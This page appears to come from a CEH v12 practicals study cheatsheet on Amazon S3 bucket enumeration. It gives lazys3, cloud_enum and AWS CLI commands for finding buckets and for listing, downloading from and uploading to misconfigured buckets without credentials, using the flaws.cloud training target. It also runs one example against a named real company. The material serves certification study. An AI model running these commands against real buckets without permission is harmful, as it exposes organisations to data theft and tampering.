Thamizhiniyan C S

CEH Practicals v12

Guides Resources CEH Practicals v12

Home Writeups Resources Cheatsheets

Home Writeups Resources Cheatsheets

CEH Practicals v12

Guides Resources CEH Practicals v12

Introduction
Foot Printing and Reconnaisance
Network Scanning and Enumeration
Service Enumeration
System Hacking
Steganography and Hiding Activities
Hacking Web Applications and Web Servers
Packet Analysis with Wireshark
Hacking Mobile Platforms
Wifi Hacking
S3 Bucket Enumeration
Cryptography
Malware Analysis
IoT Analysis and Hacking
Privilege Escalation

Powered by GitBook

On this page

Was this helpful?

S3 Bucket Enumeration

PreviousWifi Hacking NextCryptography

Last updated 1 year ago

Was this helpful?

Lazys3 - Ruby Script

ruby lazys3.rb <company>
ruby lazys3.rb pakwheels

Cloud_enum

sudo apt install cloud-enum
cloud_enum -k [flaws.cloud](<http://flaws.cloud>) --disable-azure --disable-gcp

S3BucketList - Browser Extension

Manual Installation

Exploiting S3 UnAuthenticated

sudo apt-get install awscli
cloud_enum -k [flaws.cloud](<http://flaws.cloud>) --disable-azure --disable-gcp
aws s3 ls s3://flaws.cloud/ --no-sign-request
Download - aws s3 cp s3://flaws.cloud/secret.html ./ --no-sign-request
Upload - aws s3 cp ./index.html s3://flaws.cloud/secret.html --no-sign-request

Exploiting S3 Authenticated

Create a free AWS account
Go to AWS IAM dashboard
Users → Add New user with programmatic access credential type
Once user is created, note down the access key and secret access key
Click User → Permissions → Add permissions → Attach existing policies → AmazonS3FullAccess
aws configure --profile someone
aws s3 --profile someone ls s3://flaws.cloud/ --no-sign-request
aws s3 --profile someone cp s3://flaws.cloud/something.html ./

Lazys3 - Ruby Script
Cloud_enum
S3BucketList - Browser Extension
Exploiting S3 UnAuthenticated
Exploiting S3 Authenticated

GitHub - nahamsec/lazys3GitHub

GitHub - AlecBlance/S3BucketList: Chrome extension that lists Amazon S3 Buckets while browsingGitHub